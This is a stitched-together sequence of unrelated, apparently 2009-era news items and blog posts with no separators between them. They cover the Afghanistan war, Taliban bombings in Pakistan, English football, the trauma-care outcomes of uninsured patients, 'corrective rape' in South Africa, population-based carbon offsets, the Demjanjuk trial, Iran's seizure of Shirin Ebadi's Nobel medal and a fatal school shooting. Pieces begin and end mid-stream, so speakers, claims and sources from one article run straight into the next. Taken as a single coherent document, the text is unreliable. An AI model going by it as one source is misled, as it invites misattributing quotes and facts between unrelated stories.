The president handled that absurdity by conflating al - Qaida , which he admitted is holed up in Pakistan , with the Taliban and denying the McChrystal report ’s basic assumption that the enemy in Afghanistan is local in both origin and focus .
Obama stated Tuesday in a speech announcing a major escalation of the war , “ It ’s important to recall why America and our allies were compelled to fight a war in Afghanistan in the first place . ”
But he then cut off any serious consideration of that question with the bald assertion that “ we did not ask for this fight . ”
Of course we did .
The Islamic fanatics who seized power in Afghanistan were previously backed by the U.S. as “ freedom fighters ” in what was once marketed as a bold adventure in Cold War one - upmanship against the Soviets .
It was President Jimmy Carter , aided by a young liberal hawk named Richard Holbrooke , now Obama ’s civilian point man on Afghanistan , who decided to support Muslim fanatics there .
Holbrooke began his government service as one of the “ Best and the Brightest ” in Vietnam and was involved with the rural pacification and Phoenix assassination program in that country , and he is now a big advocate of the counterinsurgency program proposed by Gen.
Stanley A. McChrystal to once again win the hearts and minds of locals who want none of it .
The current president ’s military point man , Defense Secretary Robert Gates , served in Carter ’s National Security Council and knows that Obama is speaking falsely when he asserts it was the Soviet occupation that gave rise to the Muslim insurgency that we abetted .
Gates wrote a memoir in 1996 which , as his publisher proclaimed , exposed “ Carter ’s never - before - revealed covert support to Afghan mujahedeen — six months before the Soviets invaded . ”
Carter ’s national security adviser , Zbigniew Brzezinski , was asked in a 1998 interview with the French magazine Le Nouvel Observateur if he regretted “ having given arms and advice to future terrorists , ” and he answered , “ What is most important to the history of the world ?
The Taliban or the collapse of the Soviet empire ?
Some stirred - up Muslims or the liberation of Central Europe and the end of the Cold War ? ”
Brzezinski made that statement three years before the 9/11 attack by those “ stirred - up Muslims . ”
So here we go again , selling firewater to the natives and calling it salvation .
We have decided to prop up a hopelessly corrupt Afghan government because , as Obama argued in one of the more disgraceful passages of Tuesday ’s West Point speech , “ although it was marred by fraud , [ the recent ] election produced a government that is consistent with Afghanistan ’s laws and constitution . ”
To suggest that the Afghan government will be in seriously better shape 18 months after 30,000 additional U.S. and perhaps 5,000 more NATO troops are dispatched is bizarrely out of touch with the strategy of the McChrystal report , which calls for American troops to restructure life down to the level of the most forlorn village .
Surely the civilian and military supporters of that approach who are cheering Obama on have been giving assurances that he will not be held to such an unrealistically short timeline .
Evidence of this was offered in the president ’s speech when he said of the planned withdrawal of some forces by July of 2011 : “ Just as we have done in Iraq , we will execute this transition responsibly , taking into account conditions on the ground .
We ’ll continue to advise and assist Afghanistan ’s security forces to ensure that they can succeed over the long haul . ”
A very long haul indeed , if one checks the experience of Matthew Hoh , the former Marine captain who was credited with being as successful as anyone in implementing the counterinsurgency strategy now in vogue .
In his letter of resignation as a foreign service officer in charge of one of the most hotly contested areas , Hoh wrote : “ In the course of my five months of service in Afghanistan … I have lost understanding and confidence in the strategic purpose of the United States ’ presence in Afghanistan . …
I have observed that the bulk of the insurgency fights not for the white banner of the Taliban , but rather against the presence of foreign soldiers and taxes imposed by an unrepresentative government in Kabul . ”
Maybe they should have given Capt .
Hoh the Noble Peace Prize .
The Woman For The Rest Of My Life
Posted by : Madame M .
I met this girl in 1972 .
She was 14 .
We married she was 17 .
Myself was 20 .
These pics are in the age of 18 - 20 .
She is the Best , that happens in my life .
She the woman of the rest of my life .
Please excuse the bad Quality .
The pics are 35 Years old and produced with a scanner .
A suicide bomber detonated his vest outside a courthouse in Peshawar , killing 11 in the latest attack in the northwestern city .
The bomber detonated his vest at the gates of a courthouse in the capital of the Northwest Frontier Province after security prevented him from entering the compound .
Two policemen and three lawyers were among the 11 killed .
The attack also wounded 47 people , two of them critically .
The Taliban conducted a similar suicide attack outside a court complex in Peshawar on Nov. 19 .
The suicide bomber killed 19 people and wounded scores more after detonating outside the provincial court complex .
Today ’s attack is the latest in the Taliban ’s terror campaign in Pakistan .
The Taliban launched the offensive on Oct. 5 and have demanded that the military end operations in the tribal areas .
The military went on the offensive in South Waziristan on Oct. 17 , and recently claimed that the Taliban ’s defeat there struck a strategic blow to the organization .
But the Taliban have regrouped in the tribal areas and continued the attacks .
The Taliban have launched suicide attacks in Pakistan ’s major cities , including the capital of Islamabad , the military garrison city of Rawalpindi , Lahore , and Peshawar .
Taliban suicide assault teams have also targeted military installations in Rawalpindi , Lahore , and Peshawar .
The Army General Headquarters was shut down for a day during an assault , while police and intelligence services centers in Lahore and Peshawar were also targeted .
The latest such attack , on Dec. 6 , targeted a mosque attended by military officers in Rawalpindi .
Two generals and four other officers were among the 40 Pakistanis killed .
The sons and fathers of senior officers were also killed in the attack .
The Taliban have also conducted a campaign against tribal leaders who have organized militias to oppose the spread of the Islamist terrorists .
Dozens of tribal leaders have been killed in suicide attacks , roadside bombings , and shootings .
In the past week alone , seven anti-Taliban tribal leaders have been reported killed .
Major Taliban attacks in Pakistan since Oct. 5 :
Dec. 7 , 2009 : Two suicide bombers detonated their vests near - simultaneously about 100 feet apart in the middle of the Moon Market , a commercial hub in the eastern city of Lahore .
More than 45 people were killed .
Dec. 7 , 2009 : A suicide bomber killed 11 Pakistanis outside a Peshawar courthouse .
Dec. 6 , 2009 : The Taliban killed two tribal leaders in an IED attack in the Mamond region in the Bajaur tribal agency .
Dec. 4 , 2009 : A suicide assault team killed 40 Pakistani worshippers in a mosque in the military garrison city of Rawalpindi .
Two senior generals were killed in the attack .
Dec. 2 , 2009 : A suicide bomber killed a naval security guard at the guardpost outside the naval headquarters in the capital of Islamabad .
Dec. 2 , 2009 : The Taliban assassinated three pro-government tribal leaders in Arakzai and another in Swabi .
Dec. 1 , 2009 : A suicide bomber killed a member of a secular Pashtun political party who served in the provincial assembly outside his home in Swat .
Nov. 19 , 2009 : A suicide bomber killed 19 people in an attack outside of the provincial judicial complex in Peshawar .
Nov. 16 , 2009 : A suicide bomber killed four people in an attack on a police station in Peshawar .
Nov. 15 , 2009 : The Taliban killed a tribal leader in Bajaur and targeted a mayor in Peshawar .
Nov. 13 , 2009 : A suicide bomber killed 10 people in an attack on a police checkpoint in Peshawar .
Nov. 13 , 2009 : A suicide bomber killed 10 people in an attack on the headquarters of the Inter - Services Intelligence agency in Peshawar .
Nov. 13 , 2009 : A suicide bomber wounded 10 people in an attack on a police station in Bannu .
Nov. 10 , 2009 : A suicide bomber killed 24 people in a market in Charsadda .
Nov. 9 , 2009 : A suicide bomber killed four people during an attack at a police checkpoint outside Peshawar .
Nov. 8 , 2009 : A suicide bomber killed an anti-Taliban leader and 12 others in an attack at a market in the town of Matni near Peshawar .
Nov. 5 , 2009 : An Army brigadier and a soldier were wounded in an ambush in Islamabad .
Nov. 2 , 2009 : A Taliban suicide bomber killed 34 Pakistanis and wounded scores more in an attack in Rawalpindi .
Nov. 2 , 2009 : A pair of suicide bombers killed one policeman and wounded 25 security officers and civilians after the pair detonated their vests at a security checkpoint .
Oct. 28 , 2009 : A Taliban suicide bomber killed 119 Pakistanis and wounded hundreds more in an attack on a bazaar in Peshawar .
Oct. 27 , 2009 : A brigadier general who served as the director of defense services guards at the Army General Headquarters escaped an assassination attempt in Islamabad .
Oct. 23 , 2009 : The Taliban detonated an anti-tank mine and hit a bus transporting a wedding party in Mohmand .
The explosion killed 15 of the passengers and wounded six more .
Oct. 23 , 2009 : The Taliban detonated a car bomb outside a popular restaurant in the residential Hayatabad area in Peshawar .
The attack wounded 13 civilians ; nine are said to be in critical condition .
Oct. 23 , 2009 : A Taliban suicide bomber killed seven people during an attack at a security checkpoint near the Kamra Air Weapon Complex in the district of Attock in Punjab province .
Oct. 21 , 2009 : The Taliban assassinated a brigadier general and his driver during an ambush in Islamabad .
Oct. 20 , 2009 : A pair of suicide bombers detonated their vests at Islamabad ’s International Islamic University , killing five .
Oct. 16 , 2009 : A pair of suicide bombers , including a female , attacked a police station and a building housing an intelligence service in Peshawar , killing 11 .
Oct. 15 , 2009 : Terrorist assault teams attacked the Federal Investigation Agency building , the Manawan police training center , and the Elite Force Headquarters in Lahore .
Twenty - six people , including nine terrorists and 12 policemen , were killed .
Oct. 15 , 2009 : A suicide bomber rammed a car into a police station in Kohat , killing 11 people , including policemen and children .
Oct. 12 , 2009 : A suicide bomber detonated a car packed with explosives as a military convoy passed through a checkpoint in a market in Alpuri in Shangla .
The attack killed 41 people , including six security personnel .
Oct. 10 , 2009 : An assault team attacked the Army General Headquarters and took 42 security personnel captive .
Eleven soldiers were killed , including a brigadier general and a lieutenant colonel , along with nine members of the assault team ; and 39 hostages were freed .
Oct. 9 , 2009 : A suicide bomber detonated a car packed with explosives in a bazaar in Peshawar , killing 49 civilians .
Oct. 5 , 2009 : A suicide bomber entered the World Food Program office in Islamabad and detonated his vest , killing five UN workers , including an Iraqi .
Bill Roggio is a Senior Fellow at the Foundation for Defense of Democracies and the Editor of FDD 's Long War Journal .
Are you a dedicated reader of FDD 's Long War Journal ?
Has our research benefitted you or your team over the years ?
Support our independent reporting and analysis today by considering a one - time or monthly donation .
Thanks for reading !
You can make a tax - deductible donation here .
I do n’t think this guy ’s spinning .
Too many people know the truth and too much evidence is available online for him to deliberately lie and think he could get away with it .
Either he , like Gibbs , was in some sort of coma for most of the last decade or else the sheer dynamic magic of Hopenchange really does have them convinced that history started on January 20 , 2009 .
Every religion follows a calendar that began with the appearance of its oracle .
No difference here , really .
Even so , given a choice between this guy and the guy he beat , it ’s a wash at best .
Click the image to listen .
Harry Redknapp has proclaimed the end of the Premier League 's big four by declaring that only Chelsea and Manchester United are certainties to finish in the Champions League places this season and that the other pair of prized berths for Europe 's elite tournament could be filled by any two of several teams – including Tottenham Hotspur .
Liverpool 's wobbles so far this season had convinced many observers that one member of the customary top four could be about to surrender their place but after watching his team intensify the pressure on Mark Hughes by trouncing Manchester City 3 - 0 to end a run of three matches without a win and hoist themselves up to fifth in the table , Redknapp suggested Arsenal may also fall from grace .
" I 've said since the start of the season that the champions will come from Chelsea or Manchester United but after that it 's up for grabs , " he said .
" Anything is possible this season .
Look at Arsenal , you would have expected them to go up and win at Burnley after beating Liverpool , but they did n't so that shows you how hard it 's going to be . "
Spurs ' chances of fulfilling their pre-season ambitions had been ridiculed after Saturday 's home defeat by Wolves , but Redknapp railed against the detractors .
" People over - react to one result , " he said .
" One defeat and you 're finished , out of the race .
People say ' same old Tottenham , they 're going to fall flat on their face . '
Players who are great one day are useless the next – it 's unbelievable , but that 's how the game has gone unfortunately .
" We 've been consistent .
People go on about no win in three matches but in the draws at Everton and Villa our performances were very good .
A lot of teams would be happy with a point away at Everton and Villa .
It 's possible for us this year , we just have to keep picking up results . "
In keeping with his conviction that too much should not be read into one result , Redknapp refused to rule Manchester City out of the battle for the Champions League places , despite the fact that their feeble showing at White Hart Lane meant Hughes 's expensively assembled team have won just one of their last 10 league matches .
" I certainly would n't write them off , " said Redknapp .
" They 're a good team .
I expect them to be bang up there . "
Whereas Redknapp has been told he must sell some of his peripheral squad members in order to fund any new recruits in January , City have the advantage of being wealthy enough to make offers for any player they want .
City 's shortcomings last night , however , helped allay any anxiety Redknapp may have felt that superior financial resources could be decisive .
For all the money they have pumped in , City have not been able to inject their side with an unquenchable spirit .
" It 's about getting the right players , " said Redknapp .
" Sometimes you can have stars who do n't perform .
You see the game tonight and you probably think they need … well … they missed [ Craig ] Bellamy . "
The prospect of Hughes being the man to whom any January expenditure is entrusted must have been dented by last night 's disjointed performance .
The manager , however , ignored any concerns that he may pay for City 's unconvincing form with his job , instead declaring that he intends using the January transfer window to address one of the problems that he cannot hide : shambolic defending .
" At the moment we are having a bit of difficulty when balls come into our box , " said Hughes .
" It seems that every opportunity that presents itself to the opposition , they score from . "
That is tantamount to an admission that his extravagantly priced central defensive pairing of Joleon Lescott and Kolo Touré has not worked out , though the injury to Lescott , missing last night after undergoing surgery yesterday to repair a floating bone in his knee , and Touré 's imminent departure for the African Nations Cup , meant he would probably strengthen anyway .
" We 're struggling at the back , " said Hughes .
" We 've lost Joleon for six to eight weeks and lose Kolo to the African Nations Cup soon so it 's not hard to guess what are as we 'll be looking to strengthen . "
From the article :
The findings by Harvard University researchers surprised doctors and health experts who have believed emergency room care was equitable .
" This is another drop in a sea of evidence that the uninsured fare much worse in their health in the United States , " said senior author Dr. Atul Gawande , a Harvard surgeon and medical journalist
.
I 'm semi-live blogging the article , since I 'm reading and posting at the same time .
This leaves me wondering " what 's the proposed mechanism of poorer care ? "
The researchers could n't pin down the reasons behind the differences they found .
The uninsured might experience more delays being transferred from hospital to hospital .
Or they might get different care .
Or they could have more trouble communicating with doctors .
The hospitals that treat them also could have fewer resources .
Alright , so they can't quite pin down the reason .
But I rather think the latter is a strong reason .
Not far from where I sit right now is an extremely busy ER where most of the uninsured in my city get their emergency care .
And , the waits there are far longer than other ER's , to the point where if you have insurance you just plain do n't go to that ER .
OK , so they 've found that uninsured are more likely to die .
What factors did they control for ?
The researchers took into account the severity of the injuries and the patients ' race , gender and age .
After those adjustments , they still found the uninsured were 80 percent more likely to die than those with insurance — even low - income patients insured by the government 's Medicaid program .
Seems like they did a pretty good statistical analysis to me .
Another possible mechanism , courtesy of a researcher who was " surprised " and was n't involved with the study :
Some private hospitals are more likely to transfer an uninsured patient than an insured patient , said Lavonas , who was n't involved in the new research .
" Sometimes we get patients transferred and we suspect they 're being transferred because of payment issues , " he said .
" The transferring physician says , ' We 're not able to handle this . "
Ah , patient dumping .
Some claim it does n't happen ... but it does .
Adhering to the letter of the law while violating the spirit of the law , I see .
And , finally , some study statistics :
In the study , the overall death rate was 4.7 percent , so most emergency room patients survived their injuries .
The commercially insured patients had a death rate of 3.3 percent .
The uninsured patients ' death rate was 5.7 percent .
Those rates were before the adjustments for other risk factors .
The findings are based on an analysis of data from the National Trauma Data Bank , which includes more than 900 U.S. hospitals .
This study should be good ammunition to push Health care reform .
It shows that the common " meme " that if you need life - saving care , you can get it , regardless of your insurance status still ends up being wrong , in that you 're more likely to die without insurance .
I 'm not familiar with the journal it 's being published in but it seems reputable .
I 'm presuming this is a peer - reviewed study and Harvard has few , if any , crap researchers .
Brief aside at the end : I got to be one of the few non-Palin , non-bowing journals today .
And this was n't even the one I was planning on , this came up as soon as I saw the article .
I 'll have to keep an eye out on the usual suspects to see what other web sites post it .
It has been claimed lesbians in South Africa are being dragged from the streets and raped by men to ' correct ' their sexuality , according to a report .
Sky News in the UK claims it has found evidence of a new trend , so - called " corrective rape " , resulting in widespread abuse against the lesbian community .
A group of women spoken to said some feared for their lives as they all knew someone who had been dragged from the streets and raped because they had come out as gay .
One woman said the offenders covered their faces with balaclavas and she had been repeatedly threatened in her township .
Funeka Solidaat said what shocked her more than the behaviour of the masked men , was the dismissive attitude of police , saying she was made to feel like " a laughing stock . "
Another woman , Desire Dudu , believes people are risking their lives if they make their sexuality clear .
Sky News approached a group of men about attitudes towards gay women , with one man claiming lesbians should be " whipped , as there is no mention of lesbians in the Bible . "
The men all agreed women should behave like women and this was a way of teaching them that .
Climate and Capitalism has frequently commented on two widespread illusions – that global warming is caused by overpopulation , and that buying offsets is an effective way to combat greenhouse gas emissions .
I never imagined that anyone would try to combine them .
by Ian Angus
Three years ago , Carbon Trade Watch published a report called The Carbon Neutral Myth .
Its main conclusion was summarized briefly :
“ Carbon offsets are the modern day indulgences , sold to an increasingly carbon conscious public to absolve their climate sins .
Scratch the surface , however , and a disturbing picture emerges , where creative accountancy and elaborate shell games cover up the impossibility of verifying genuine climate change benefits , and where communities in the South often have little choice as offset projects are inflicted on them . ”
I wish I could say that things have improved since then , but they have n’t .
It seems as though we hear about new carbon offset schemes every week , and each one is less credible than the one before .
But competing designers of offset plans will have to work very hard to beat Optimum Population Trust ( OPT ) , an English outfit that campaigns for population control in third world countries and for reduced immigration to the UK .
For sheer chutzpah , it will be hard to beat PopOffsets .
You guessed it .
Instead of actually reducing your carbon emissions , you can now pay OPT to persuade third world women not to have babies !
What ’s more , it ’s cheap .
According to the website :
“ Research is indicating that providing a currently unmet need for family planning is the lowest cost way of reducing CO2 emissions and climate change – possibly less than one third of the cost of other technological fixes – without any environmental downsides . ” [ 1 ]
They have an online calculator to determine how much money you should pay to salve your conscience .
As a resident of Canada , which has one of the world ’s highest per capita emission rates , I can get a PopOffsets Certificate that proclaims me “ carbon neutral ” for a year — for only 100 euros .
OPT says that it will use my money ( “ less minimal / unavoidable costs ” ) to provide grants to unnamed “ family planning organizations . ”
Just in case you object on religious grounds , they promise that they will “ not direct funding towards abortion services . ”
Now there are some catches .
According to the PopOffsets ’ FAQ :
There are no standards for measuring or verifying the effectiveness of any voluntary offset program , including this one .
The PopOffsets plan is not accredited by anyone , but OPT is “ running a campaign to achieve accreditation in the long term . ”
They have n’t actually decided who will get the money .
And “ more work needs to be carried out on quantifying this methodology of CO2 reductions . ”
That last point should be nominated for Understatement of the Year .
I might take this a little more seriously if the money were used to reduce the birth rate among rich Brits .
Just think how much lower England ’s emissions would be if aristocrats and bank directors were limited to one spoiled child each .
How many Bentleys and Jaguars could be taken off the road if the Royal Family stopped reproducing altogether ?
But no .
Rather than targeting the high - emitting rich , the only concrete project mentioned by PopOffsets is a family planning program in Madagascar , where , according to PopOffsets ’ own website , annual emissions are just 0.1 tonnes per person .
Per capita emissions in the UK are nearly 100 times that level – and the emissions generated by the richest Britons are of course much higher .
In short , instead of targeting actual high emitters , PopOffsets blames the world ’s poorest people for a problem created by the rich , and it solicits funds for unnamed projects whose impact on global warming is at best unmeasurable .
Even if you are totally convinced that reducing population is the way to go , the PopOffsets scheme is hard to swallow .
There ’s a satirical website , Cheatneutral.com , which promises to “ neutralise your cheating , ” by letting you pay someone else to remain monogamous and faithful .
It says :
“ Cheatneutral is about offsetting infidelity .
We ’re the only people doing it , and Cheatneutral is a joke .
“ Carbon offsetting is about paying for the right to carry on emitting carbon .
The Carbon offset industry sold £ 60 million of offsets last year , and is rapidly growing .
Carbon offsetting is also a joke . ”
I wo n’t be surprised if some unsuspecting websurfer mistakes PopOffsets for an even more elaborate joke .
Unfortunately , it is n’t one .
* * * * * * * *
Footnote
[ 1 ]
In case you are wondering , the research turns out to be one paper by a grad student who was paid by OPT .
Peer - reviewed ?
Not a chance .
Related Reading
' City Getting Blander ' Berlin Clears One of its Last Remaining Squats
One of the last remaining squats in Berlin was cleared on Tuesday .
After a long - drawn out legal battle , 600 police descended on Brunnenstrasse 183 to evict the occupants .
Berlin 's days as a squatter 's paradise and alternative mecca are long gone .
Von Siobhán Dowling
View Transcript
Transcript
Alice says , " My computer kept locking up , so I had to let off some steam . "
The Boss says , " You ca n't fix your computer by punching it ! "
Alice says , " Why would I punch my computer ?
That 's crazy . "
Asok says , " Alice ? "
Editor 's note : Michael Connelly came across the Ani Ashekian case while researching " Nine Dragons , " which is # 3 on this week 's New York Times Bestsellers list .
Los Angeles , California ( CNN ) --
The saying goes that life imitates art .
But that 's the last thing you want when you write crime fiction .
You never want to see the things you write about mirrored back to you in real life .
But a month ago as I prepared to publish and promote my latest detective novel , " Nine Dragons , " I learned of a true mystery with eerie similarities and connections to my story and my research .
It has been a heart - tugging reminder that while crime novels may be entertaining thrill rides and puzzles , they also skirt the shores of reality for many .
Before writing novels I worked as a police and crime reporter in Los Angeles .
What I saw and wrote about back then became the grist of my fiction .
In that case , art imitating life .
I took real stories -- a daring bank heist , a conversation with a killer , the unsolved murder of a sports agent found in the trunk of his Rolls Royce -- and turned them into fictionalized investigations in which my fictional hero , Detective Harry Bosch , always won the day .
That was fine .
That worked .
What was done was done and I could bend the truth and make the story my own in fiction .
I think that is the crime novelist 's job , to take inspiration from the real world and to turn it back as something that entertains , puzzles and maybe -- if you 're good -- even reflects the world back at the reader .
To me , there is an art in that .
But this time things have gone the other way .
In " Nine Dragons , " Harry Bosch is working a murder case in Los Angeles when he gets word that his young daughter has disappeared in Hong Kong .
It 's every father 's nightmare .
Harry drops everything , including his case , and flies to Hong Kong to find her .
He traces her last known location to a spot in the Tsim Sha Tsui neighborhood of Kowloon called Chungking Mansions .
After that point , she has vanished .
Behind the Scenes : Producer shares her memories of Connelly
Chungking Mansions is a well - known place to many travelers to Asia .
It is sort of a modern Casablanca , a crossroads of the world .
It is several cut -rate hotels housed in one large and old building , and all of it above a world bazaar where dozens of languages are spoken , and food and other comfort items from almost any country in Asia can be found and purchased .
It is the kind of place where Harry Bosch checks his back repeatedly as he walks through .
It is also the kind of place where I checked my back repeatedly when I walked through while researching the book .
This was because I had a camera behind me .
Last November
I went to Hong Kong and visited Chungking Mansions repeatedly as I made a final research journey while writing the book .
Filmmaker Terrill Lee Lankford went with me so he could document my research of the places that would be in the novel .
This was so I could refer to video while writing about Hong Kong once I returned home .
It was also so he could make small films that could be used to document and promote the book when it was published .
This is where the real life mystery entered my seemingly harmless world of crime fiction .
I live in Florida and Lankford lives in California .
As he put together short films on my visit to Hong Kong , he used YouTube to privately send me rough edits over the Internet .
Lankford noticed that YouTube had connected his films by subject matter to another film about Hong Kong and Chungking Mansions .
I took a look and the troubling connection between fact and fiction began .
The other film was about the disappearance of 31 - year - old Canadian tourist Ani Ashekian from Hong Kong , and more specifically Chungking Mansions .
What 's more is that Ani 's last sighting was on November 10 , 2008 , just two days before I arrived in Hong Kong and visited Chungking Mansions myself .
In the details the stories are quite different .
Ani Ashekian was a veteran traveler who enjoyed solo journeys from Toronto , Canada .
She came to Hong Kong after visiting mainland China and stayed in a hotel at the Chungking Mansions .
In Nine Dragons , Bosch 's daughter is only 13 and a whole different set of circumstances take her to the same building .
But the crossroads of fiction and reality still leaves a pit in my stomach .
Nobody really gets hurt or vanishes for good in fiction .
But it 's been almost a year now and nobody has heard from Ani .
Her passport and credit cards have not been used .
The very last sighting of her is on November 10 on an ATM camera in Causeway Bay across the harbor from Kowloon .
The very last communication is a text she sent to her niece in Toronto on the same day .
She offered Happy Birthday wishes .
Thinking that maybe she was still at Chungking Mansions on November 12 when I got there , I have repeatedly looked at the video taken over two days by Lankford .
There are hundreds of faces moving in and out of the camera 's frame , but none appear to be Ani .
Whatever happened may have already happened by then .
The police in Hong Kong have been investigating the disappearance .
So too have private investigators , a veteran reporter for the South China Morning Post , as well as Ani 's family .
But nobody has moved the mystery past that ATM photo .
Her journey was supposed to end on December 15 with her return to Toronto from India .
She never made it to India or back home .
Ani has vanished without anything to go on .
And that 's where this gets to me .
In crime fiction , there is always something to go on .
When Harry Bosch 's daughter disappears , he finds a clue at Chungking Mansions and the case moves on .
He is a relentless father who will stop at nothing to find her .
But in real life it does n't always happen that way .
You can't be relentless with nothing to go on .
Sometimes there is no direction and no answers and families and other loved ones are left with an unabated dread that hollows out their lives .
Still , with stories like the recent rescue of the long ago abducted Jaycee Dugard in the news , nobody gives up hope .
Sometimes hope is all that is left .
I remember this from my days as a reporter -- that hollow dread and desperate hope I could read in the eyes of some of the people I interviewed -- and I thought I had left it all behind for the comfortable confines of fiction .
Sometimes it does n't work out that way .
Now when I think back on my research trip to Hong Kong , I think of the young woman from Toronto who visited the same place and never returned home .
Alamy
INDIA'S retailers suffer the highest levels of theft , according to the “ Global Retail Theft Barometer ” survey of 41 countries .
Losses from a combination of shoplifting , worker and supplier theft , and accounting errors amounted to 3 % of all retail sales .
This “ shrinkage ” cost global retailers almost $ 115 billion in 2009 , up by 5.9 % from the previous year .
Much of this increase was caused by a rise in shoplifting , particularly in America and Europe .
Branded clothes and fashion accessories were the most prized items globally , with items for the car and home - improvement goods a close second .
In Europe the most pilfered grocery item is luxury cooked meat .
MUNICH , Germany ( CNN ) -- Alleged Nazi camp guard John Demjanjuk had no choice but to bring Jews to their deaths in extermination camps , Demjanjuk 's defense argued Monday as his long - awaited trial got under way .
Demjanjuk , 89 , faces charges of being an accessory to about 27,900 murders during World War II .
But his defense attorney , Ulrich Busch , said Monday the court was imposing a " moral and judicial double standard . "
The retired auto worker from Cleveland , Ohio -- a native Ukrainian -- was a prisoner of war during the conflict , and would have been killed had he not done what the Nazis ordered , the defense team argued .
The defense line that Demjanjuk was forced to help the Nazis represents a change for the defendant , who has denied in the past that he was a camp guard .
The guards forced to help the Nazis were " victims , not culprits -- survivors , not murderers , " defense lawyer Busch said .
Higher - ranking German SS officers in a similar situation have been found not guilty of war crimes , the defense argued .
The Munich state prosecutor brought the charges against Demjanjuk for his alleged role at the Sobibor death camp in Poland , where the Nazis and their accessories killed at least 167,000 people , according to the U.S Holocaust Memorial Museum .
About 30 relatives of victims have joined the prosecution case .
In Germany it is possible for the families to join the prosecution case as co-plaintiffs , representing named individuals who died in the death camps .
If Demjanjuk is found guilty , it will not be only for 27,900 anonymous murders , but for the murders of victims specifically named by the co-plantiffs .
There are very few remaining survivors of Sobibor .
Demjanjuk 's defenders say he was a Soviet prisoner of war at the Trawniki camp , where Nazis trained prisoners to assist with the extermination of about 2 million Jews in occupied Poland .
Those prisoners of war had no choice but to assist , the defense said .
Demjanjuk was brought into the court in a wheelchair , accompanied by medical personnel and a German - Ukrainian translator .
He did not speak in the opening phase of the trial , and had his eyes shut most of the time .
The trial is expected to last until May of next year .
He was deported in May from the United States to Germany .
The German court originally accused him of complicity in about 29,000 murders .
The prosecutor 's office said it revised the number because some of those who had allegedly died in the camp when Demjanjuk was there were already dead during the transport to Sobibor .
Demjanjuk lost a U.S. Supreme Court case against his deportation .
His lawyers had asked the high court to consider their claims that he was too ill and frail to be sent overseas .
They also raised human rights and other legal issues .
The Munich State Court ruled earlier this year he was fit to stand trial .
But doctors have restricted the time he can be tried each day to two sessions of 90 minutes each , said Anton Winkler , Munich state prosecutor .
The accusations against Demjanjuk date to the late 1970s , when the U.S. Justice Department accused him of being a Nazi guard known as " Ivan the Terrible . "
His U.S. citizenship was revoked in 1981 , and he was extradited to Israel in 1986 .
Demjanjuk was convicted in an Israeli court in 1988 and sentenced to death , but that conviction was overturned in 1993 amid evidence that someone else was " Ivan the Terrible . "
A federal court restored Demjanjuk 's citizenship , ruling the government withheld evidence supporting his case .
But his citizenship was revoked again in 2002 after a federal judge ruled his 1952 entry into the United States was illegal because he hid his past as a Nazi guard .
CNN 's Diana Magnay contributed to this report .
It is with heavy hearts that we say goodbye to our dear friend and partner and close our doors after 15 great years .
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
A Cambridge shopping arcade has apologised to an 84 - year - old woman told to lower the hood of her anorak because it breached a " no hood policy " .
Managers at Grand Arcade said sorry for " any stress " Peggy Harden , who walks with a stick , may have suffered when chastised by a security guard .
The shopping centre said it operated a " no hood policy " to " ensure a safe and enjoyable shopping experience " .
Mrs Harden 's husband Desmond said the actions were " absolutely ridiculous " .
Mrs Harden said : " I was quite amazed .
' Shopping experience '
" If I had done something I do n't think I could have run very far . "
The arcade issued a statement headed ' Hood policy ' after a local newspaper revealed how Mrs Harden had been approached while walking with husband Desmond , also 84 .
The statement said : " Grand Arcade has a ' no - hood ' policy within the centre .
This is to ensure a safe and enjoyable shopping experience for everyone .
" However , it is not our intention to cause any upset and we apologise for any stress this may have caused .
" We are reviewing our policy to ensure the safety and well - being of all our customers . "
( CNN ) -- Iran is denying Norway 's claim that the Islamic republic confiscated the Nobel Peace Prize of human rights activist Shirin Ebadi , and indicated the issue involved tax evasion .
" It is most surprising to see Norwegian officials jump to conclusions without respecting international regulations and taking enough time to see both sides of the matter , " said Iranian Foreign Ministry spokesman Ramin Mehman - Parast , quoted by Iran 's Press TV .
Iran 's Islamic Republic News Agency quoted the spokesman as denying Iran confiscated Ebadi 's prize .
But at the same time , Mehman - Parast was quoted by Press TV as saying " much the same as European countries , tax evasion is a crime in Iran and individuals would face legal penalties should they commit such an act . "
Ebadi won 10 million Swedish kronor ( $ 1.3 million ) for the prize .
There are news reports saying Tehran 's Revolutionary Court also froze her bank accounts and is demanding $ 410,000 in taxes it said was owed on her Nobel Prize money .
But IRNA also quoted Mehman - Parast as denying it froze Ebadi 's bank account .
While the other Nobel prizes are awarded by committees based in Sweden , the Nobel peace prize is determined by a five - member panel appointed by the Norwegian parliament .
Ebadi received the award in 2003 .
Norwegian Foreign Minister Jonas Gahr Store said on Thursday in a written statement that " the medal and the diploma have been removed from Dr. Ebadi 's bank box , together with other personal items .
Such an act leaves us feeling shock and disbelief . "
Norway 's Ministry of Foreign Affairs said in a written statement that it " has reacted strongly " and had summoned the Iranian charge d'affaires on Wednesday afternoon to protest the move .
During the meeting with the Iranian charge d'affaires , State Secretary Gary Larsen also expressed " grave concern " about how Ebadi 's husband has been allegedly treated .
" Earlier this autumn , he ( Ebadi's husband ) was arrested in Tehran and severely beaten .
His pension has been stopped and his bank account has been frozen , " the statement from Norway said .
IRNA also quoted Mehman - Parast as denying it froze Ebadi 's bank account .
Store said in the statement that it marked the " first time a Nobel Peace Prize has been confiscated by national authorities . "
The peace prize is one of five awarded annually since 1901 by the Nobel Foundation in Stockholm , Sweden .
The other four prizes are for physiology or medicine , physics , chemistry and literature .
Starting in 1969 , the Sveriges Riksbank Prize in Economic Sciences in Memory of Alfred Nobel also has been awarded .
Ebadi received the prize for her focus on human rights , especially on the struggle to improve the status of women and children .
A statement from the Nobel committee at the time said , " As a lawyer , judge , lecturer , writer and activist , she has spoken out clearly and strongly in her country , Iran , and far beyond its borders . "
The report cited Mehman - Parast as saying that if Norwegian officials " really cared about human rights , " the country would n't have abstained on a vote involving the Goldstone Report , a review of Israeli and Hamas actions during the Gaza offensive .
A 16 - year - old high school student who was shot five times and killed by a South Carolina school officer had a form of autism , news reports say .
Trevor Varinecz , who died within hours of being shot by school resource officer Marcus Rhodes , had pulled a knife and stabbed the officer , according to NewsChannel 5 in South Carolina .
His mother told the TV station that Varinecz had suffered from Asperger ’s Syndrome , a high - functioning version of autism .
ADVERTISEMENT
Horry County prosecutors say Officer Rhodes was justified in the shooting .
The incident took place on Friday morning at Carolina Forest High School in Conway , South Carolina , when Varinecz is said to have pulled a knife on Officer Rhodes and stabbed him several times .
The officer responded by shooting Varinecz five times .
Rhodes was hospitalized for his wounds , and released from hospital several hours after the incident .
Varinecz died shortly after altercation .
